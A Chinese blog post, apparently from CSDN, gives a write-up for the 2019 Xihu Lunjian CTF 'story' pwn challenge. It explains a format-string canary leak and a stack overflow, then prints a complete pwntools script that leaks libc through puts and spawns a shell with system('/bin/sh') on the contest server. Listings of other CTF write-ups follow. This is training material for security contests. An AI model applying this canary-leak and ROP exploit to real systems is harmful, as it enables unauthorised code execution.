2019西湖论剑writeup

最新推荐文章于 2022-01-16 17:15:30 发布
最新推荐文章于 2022-01-16 17:15:30 发布
阅读量1.8k 收藏
点赞数
分类专栏: 栈溢出 格式化字符串 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44113469/article/details/89066550
版权

pwn

0x01 story
保护
在这里插入图片描述
开启了NX,canary

题目分析
在这里插入图片描述

在这里插入图片描述
明显的格式化字符漏洞,用来泄露canary的值,直观思路
在这里插入图片描述

在这里插入图片描述
v1控制写入s的数量,可以控制v1使s溢出,控制ret返回puts,泄露某个函数地址,计算出libc基址,算出system,str_bin_sh。再次溢出,getshell。

# -*- coding:utf-8 -*-  
from pwn import *
from LibcSearcher import LibcSearcher
context(os='linux', arch='amd64', log_level='debug')
p=remote("ctf1.linkedbyx.com",10025)
elf = ELF("./story")
pop_rdi=0x0000000000400bd3
read_got=elf.got["read"]
put_plt=elf.plt["puts"]
main=0x400876
p.sendlineafter("ID:","%15$p")#泄露出canary值
p.recvuntil("Hello ")
s=int(p.recvuntil("00"),16)
print hex(s)
#-------------------------------------------------------------
p.sendlineafter("Tell me the size of your story:\n",str(129))#yichu
pay = "a"*136+p64(s)+"a"*8+p64(pop_rdi)
pay+=p64(elf.got["puts"])+p64(elf.plt["puts"])+p64(main)
p.sendlineafter("can speak your story:\n",pay)
puts_addr = u64(p.recv(6).ljust(8, "\x00"))
print hex(puts_addr)
libc = LibcSearcher("puts" , puts_addr)
libc_base = puts_addr - libc.dump("puts")
system = libc_base + libc.dump("system")
str_bin_sh = libc_base + libc.dump("str_bin_sh")
#-------------------------------------------------------------
p.sendlineafter("ID:","%15$p")#泄露出canary值
p.recvuntil("Hello ")
s=int(p.recvuntil("00"),16)
print hex(s)
p.sendlineafter("Tell me the size of your story:\n",str(129))#yichu
pay = "a"*136+p64(s)+"a"*8+p64(pop_rdi)
pay+=p64(str_bin_sh)+p64(system)
p.sendlineafter("You can speak your story:\n",pay)
p.interactive()
梦回Altay
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2019西湖论剑re
40KO的博客
04-08 948
easyCpp 本来想静态看出来,看不了。。。IDA调试插件崩了,无奈得使用gdb。首先随便输⼊16个数字 gdb-peda$ r Starting program: /mnt/c/CTF/reverse/xihu/easyCpp_o 100 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 然后下断看以下函数做了什么 最下方begin的返回...
2019西湖论剑预选赛题目及write up(难度中等)-b64_c3VuJTIwYm95-it720.docx
11-29
CTF安全大赛必刷题
2019西湖论剑网络安全技能大赛(大学生组)部分WriteUp
weixin_30501857的博客
04-08 648
这次比赛是我参加以来成绩最好的一次,这离不开我们的小团队中任何一个人的努力,熬了一整天才答完题,差点饿死在工作室(门卫大爷出去散步,把大门锁了出不去,还好学弟提了几个盒饭用网线从窗户钓上来才吃到了午饭)。写好WP回到宿舍的时候已经快十二点了,随便吃了点面包倒头就睡...... 接下来大概写写我们的解题思路,由于做题的时候没想到可以进名次,而且赛后比赛平台也关了,所以很多实现过程的截图就...
2019西湖论剑web wp
weixin_30307267的博客
04-12 624
发在正文前 这应该是自己在安全圈摸爬滚打两年多以来第一次正规的ctf比赛。没解出flag,没截图,只提供了一些思路。 遥想往昔,初入大学,带着对PT的向往,一个人穿行在幽暗的图书馆,翻阅啃读一本本安全书籍(后来事实证明,纯属瞎折腾。在此也表达下对那些无师自通的大
2019西湖论剑——一小小部分writeup
地址ch3nye.top
04-07 2113
Misc: 奇怪的TTL 题目描述: 我们截获了一些IP数据报,发现报文头中的TTL值特别可疑,怀疑是通信方嵌入了数据到TTL,我们将这些TTL值提取了出来,你能看出什么端倪吗? 通过不断尝试找到一种正确的思路: 在TTL字段中隐藏 IP报文在路由间穿梭的时候每经过一个路由,TTL就会减1,当TTL为0的时候,该报文就会被丢弃。TTL所占的位数是8位,也就是0-255的范围,但是在大多...
西湖论剑WriteUp By Nu1L.pdf
11-26
"西湖论剑WriteUp By Nu1L" 本文档涵盖了多个IT领域的知识点,涵盖了信息安全、密码学、编程语言和算法等领域。下面将逐一介绍这些知识点。 1. Reverse ROR(Reverse Rotate Right):从代码中可以看到,作者使用...
2019美亚杯writeup
最新发布
03-26
本资源摘要信息来自2019美亚杯writeup,内容涉及电子数据取证大赛的相关检材和试题等。电子数据取证大赛是一项测试电子数据取证和分析能力的比赛,参赛者需要对提供的镜像文件进行分析,回答相关问题。 本资源摘要...
[SECT2019] —writeup撰写.docx
11-28
writeup CTF
Codefest'2019 CTF writeup-b64_c3VuJTIwYm95.docx
11-29
Codefest'2019 CTF writeup 是一篇关于网络安全竞赛的总结,主要涉及的是在Codefest'19夺旗比赛中的几个挑战解决方案。CTF(Capture The Flag)是一种流行的安全竞赛,参赛者通过解决各种安全相关的谜题来获取“旗帜...
2019西湖论剑Storm_note
钞sir的博客
04-13 1万+
分析 这道题的漏洞不多,在edit note的时候有一个off_by_null漏洞: 然后还有一个后门: 没有show功能,想要泄露地址有难度;而且程序禁用了fastbin的申请: ssize_t init_proc() { ssize_t result; // rax int fd; // [rsp+Ch] [rbp-4h] setbuf(stdin, 0LL); setb...
2019 安恒周周练西湖论剑特别版 pwn 题目wp
abc380620175的博客
03-28 558
pwn1 考点:构造 shellcode,patch 汇编指令 IDA 查看反汇编,程序的逻辑很简单如,如果 直接 f5 的话 IDA 可能识别不出来函数,问题出在 0x080484CF 这个地方,call eax 指令识别不出来,所以这里可以先 patch 成 nop,之后 f5 就正常了。 程序把输入当成 shellcode 直接来执行,很显然是直接往栈上写 shellcode ...
西湖论剑CTF2019
a16511232的博客
04-11 7672
Crypto 哈夫曼之谜 哈夫曼.png 下载下来就一个文件,里面全是0101和一些字符。 搜索哈夫曼,了解到哈夫曼压缩时用到的哈夫曼树。 猜测下面的字符代表频率。 哈夫曼树建立过程如下 哈夫曼树建立.gif 字符不多,直接在草稿纸上手写。 哈夫曼手写.jpg 圆圈内就是构建好后对应字符的哈夫曼编码。 在建立过程中,对于...
西湖论剑2020 pwn mmutag wp
weixin_45677731的博客
10-11 483
拿到题目,给了libc库,太可了,爱了爱了 开局malloc(0x68)输入姓名,这个0x68给人一种熟悉的感觉 程序会顺便输出保存着chunk指针的栈地址,暂时没发现有什么吊用 heap的部分,只有malloc和free的功能 并且固定申请0x68的chunk free这里,出现了经典的free之后未置0 而且还刚好是0x68的chunk 常见做法就是double free后劫持malloc_hook 然后就是泄露libc基地址 始终没找到什么好办法,泄露出来的栈地址看似也无法得到libc_base
Kanxue看雪KCTF2019-Q1第一题【流浪者】Writeup
iqiqiya的博客
03-25 895
第一题:流浪者 IDA载入查看字符串 可以看到很多有用的信息 双击pass 接着F5查看伪代码 sub_4017f0() v5这个数组里边的元素作为下标映射出来 脚本如下: table = "abcdefghiABCDEFGHIJKLMNjklmn0123456789opqrstuvwxyzOPQRSTUVWXYZ" aa = "KanXueCTF2019JustF...
WP-2021西湖论剑
ce666666的博客
01-16 1074
2021西湖论剑-wp 前言 全靠大佬打,我是划水的。 灏妹的web 页面开发中 Dirsearch扫一下,idea泄露 ezupload 查看页面源代码,发现提示 ?source=1 发现使用_FILE进行上传,构造上传表单 访问并随便上传一个文件,放到bp里回显no 查看源码最后一个else,在此情况进行渲染temper/index.latte,同时文件也被写入temper。也就是我们上传index.latte的文件。 waf测试 {if “${nl /f*>1}”}{/if} 然后上
2019西湖论剑预选赛部分WP
weixin_33826609的博客
04-13 388
Web babyt3 点进链接发现提示 include $_GET['file'] 估计是文件包含漏洞 尝试包含index.php,发现一串base64编码,解码得到 <?php $a = @$_GET['file']; if (!$a) { $a = './templates/index.html'; } ...
安恒西湖论剑周周练Reverse刮开有奖WP
iqiqiya的博客
04-06 2609
题目信息: 这是一个赌博程序,快去赚钱吧!!!!!!!!!!!!!!!!!!!!!!!!!!!(在编辑框中的输入值,即为flag,提交即可) 无壳无花,IDA 可以直接看到具体过程 关键函数就是这个 (IDA静态分析出来的直接看的话有点问题 需要结合动态调试具体情况) BOOL __stdcall DialogFunc(HWND hDlg, UINT a2, WPARAM a3,...
西湖论剑2020writeup
Z745526156的博客
10-14 1306
2020西湖论剑 writeup(复现) MISC Yusa_yyds 下载附件得到观察game.pacp,发现本题为USB浏览分析题 观察有发送数据的字段(Leftover Capture Data字段),即IP==2.15.2与HOST之间通信的报文 和网上的资料相对比 分析该USB流量分析为键盘或者手柄 观察多个报文的时间间隔 有一些报文时间间隔明显大于其他的时间间隔 除去红框中URB_BULK in ...
190407 逆向-西湖论剑
热门推荐
whklhhhh的博客
04-08 2万+
Re1-easyCpp IDA打开发现一大堆模板很丑,但仔细看一下其实只有一堆变量来回操作而已 基本上就是各种STL和vector的用法,算法名都保留下来了所以难度下降很多 基本流程是接收输入、生成斐波那契数列的十六项 然后对输入依次使用transform和accumulate算法 分别是遍历vector中的一元运算和二元运算 运算都是自定义的方法,双击算法进去可以看到lambda函数 tra...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值